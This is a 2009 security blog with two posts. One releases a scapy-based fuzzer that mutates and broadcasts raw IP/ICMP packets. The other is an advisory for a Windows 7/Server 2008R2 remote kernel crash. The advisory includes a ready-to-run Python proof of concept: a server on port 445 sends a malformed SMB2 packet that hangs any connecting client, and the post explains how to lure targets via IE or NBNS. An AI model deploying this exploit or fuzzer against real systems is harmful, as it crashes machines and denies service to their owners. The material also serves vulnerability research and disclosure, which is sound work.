Sunday, November 22, 2009

Releasing ICMPv4/IP fuzzer prototype

This is a short message to release an IP/ICMPv4 fuzzer, destinated for UTesting, and else.
I'd like to thanks Philippe Biondi for making such a library as scapy

In this example we go deep as layer 3 fuzzing, thanks scapy, we fuzz IP and ICMP by disassembling the packet in bytes, and modifing it, and then joining it and sending back

You can simply capture a ping echo (for example) you sended and then fuzz it, you will need to replace the checksum bytes by 00 00 always, for more information :

http://www.networksorcery.com/enp/protocol/ip.htm
http://www.networksorcery.com/enp/protocol/icmp.htm

You can easily adapt this fuzzer to any kind of networking fuzzing.

Dont forget it's a prototype, and i ASSUME you know what you're doing, do not ask for help.

As blogger is not python friendly: http://pastebin.com/f5c536013

Have fun with this concept :)

#!/usr/bin/python
import random, sys,logging,os
from random import *
from scapy.all import *
logging.getLogger("scapy").setLevel(1)

##fuzzer core##
def onerand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
pack[choice(range(len(packet)))]= byte
print "fuzzing rand byte:%s\n" % (byte.encode("hex"))
return pack

def doublerand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
byte2 = str(chr(choice(range(256))))
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte2
print "fuzzing rand byte:%s byte2:%s\n" % (byte.encode("hex"),byte2.encode("hex"))
return pack

def longrand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack

def longerrand(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack

def longerrandnull(packet):
pack = packet[:]
byte = str(chr(choice(range(256))))
lon = randrange(0,600)
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte+"\x00"*lon
print "fuzzing rand byte:%s len:%s\n" % (byte.encode("hex"),lon)
return pack

def opnum(packet):
pack = packet[:]
byte = str(chr(choice(range(0,2))))
pack[choice(range(len(packet)))]= byte
print "fuzzing opnum:%s\n" % (byte.encode("hex"))
return pack

def doubleopnum(packet):
pack = packet[:]
byte = str(chr(choice(range(0,2))))
byte2 = str(chr(choice(range(0,2))))
pack[choice(range(len(packet)))]= byte
pack[choice(range(len(packet)))]= byte2
print "fuzzing opnum:%s et opnum no-2:%s\n" % (byte.encode("hex"),byte2.encode("hex"))
return pack

def remove1(packet):
pack = packet[:]
i = randrange(0, len(pack)-1)
b = pack[:i] + pack[i+1:]
print "remove one char fuzz, removed :%s"%(pack[i].encode("hex"))
return b

def changenull(packet):
pack = packet[:]
null = [i for i in range(len(pack)) if pack[i] == '\x00']
byte = str(chr(choice(range(256))))
pack[choice(null)] = byte
print "replaced one null by a %s"%(byte.encode("hex"))
return pack


def removenull(packet):
pack = packet[:]
null = [i for i in range(len(pack)) if pack[i] == '\x00']
num = choice(null)
del pack[choice(null)]
print "deleted null no-:%s"%(num)
return pack

def randfunc(packet):
func = choice([onerand,doublerand,longrand,longerrand,longerrandnull,removenull,changenull,remove1,doubleopnum,opnum])
print "using %s fuzzing type (HARD)"%(func.__name__)
return func(packet)

def zenfunc(packet):
func = choice([onerand,removenull,changenull,remove1,doubleopnum,opnum])
print "using %s fuzzing type (ZEN)"%(func.__name__)
return func(packet)

##End fuzzer core##

ip = [chr(int(a, 16)) for a in """
4e fe 01 08 00 00 40 00 fa 01 00 00 c0 a8 02 64
c0 a8 02 65 44 24 0d 01 c0 a8 02 64 04 80 30 77
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00""".split()]

icmp = [chr(int(a, 16)) for a in """
08 00 00 00 00 00 00 04 75 54 08 4b 00 00 00 00
04 6b 0d 00 00 00 00 00 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
""".split()]

def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
a= length[2:4]
pack = payload[:]
pack[2:4]= a
return pack

def OpIP(packet):
pack = packet[:]
num = str(chr(choice(range(1,9))))
num1 = str(chr(choice(range(0,150))))
#pack[0] = num
#pack[9] = num1
print "fuzzing version OPNUM no-:%s and nh OPNUM no-:%s"%(num.encode("hex"),num1.encode("hex"))
return pack

def OpIcmp(packet):
pack = packet[:]
num = str(chr(choice(range(0,42))))
pack[0] = num
print "fuzzing ICMP OPNUM no-:%s"%(num.encode("hex"))
return pack

##checksum calculation and replacement##
##checksum() ripped from scapy, hard to do better...
def checksum(pkt):
pkt=str(pkt)
s=0
if len(pkt) % 2 == 1:
pkt += "\0"
for i in range(len(pkt)/2):
s = s + (struct.unpack("!H",pkt[2*i:2*i+2])[0])
s = (s >> 16) + (s & 0xffff)
s += s >> 16
return ~s & 0xffff
##/checksum() ripped from scapy, hard to do better...

def add_checksum(packet):
a = struct.pack(">i",checksum(''.join(packet)))
b = a[2:4]
pack = packet[:]
pack[2:4]=b
return pack

def add_ip_checksum(packet):
a = struct.pack(">i",checksum(''.join(packet)))
b = a[2:4]
pack = packet[:]
pack[10:12]=b
return pack

##checksum calculation and replacement##

### snort is an example of hookin' a prog in your fuzzin'

pid = os.system("pidof snort")
while os.system("pidof snort") == pid:

a = longueur(zenfunc(ip)+add_checksum(randfunc(icmp)))
b = ''.join(add_ip_checksum(a))
packet = (Ether(dst="ff:ff:ff:ff:ff:ff",type=0x0800)/b)
print "packet IP:%s\n"%(b.encode("hex"))
sendp(packet)

##enjoy !

Wednesday, November 11, 2009

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is a real proof that SDL FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so basic, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:

netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)

If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?

"Most secure Os ever";
What ever your firewall is set to, you can get remotely smashed via IE or even via some broadcasting nbns tricks (no user interaction)


Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
..

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: This bug released.

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.